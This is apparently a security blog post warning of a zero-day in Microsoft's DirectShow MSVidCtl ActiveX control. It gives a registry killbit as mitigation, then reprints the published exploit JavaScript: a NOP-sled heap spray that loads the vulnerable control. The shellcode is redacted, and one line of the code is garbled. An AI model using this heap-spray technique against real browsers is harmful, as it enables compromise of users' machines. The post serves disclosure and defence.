New 0-day in Microsoft DirectShow

There's news of a new 0-day exploit for Microsoft's MSVidCtl.DLL (DirectShow) doing the rounds. The exploit code is publicly available on several Chinese Web sites - so be careful. There'll be plenty of noise this week concerning this 0-day.

The CSIS site has some details - and I find it disconcerting that there was any expectation that AV would preemptively detect/stop this.

You can help protect against exploitation of this control by setting the killbit for it.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\
ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400

Details of the exploit are available on the CSIS web site, but are included below:

var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
[SHELL CODE REMOVED]
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000) shuishiMVP=shuishiMVP+shuishiMVP+bZmybr; memory=new Array();
for(x=0;x<300;x++) memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';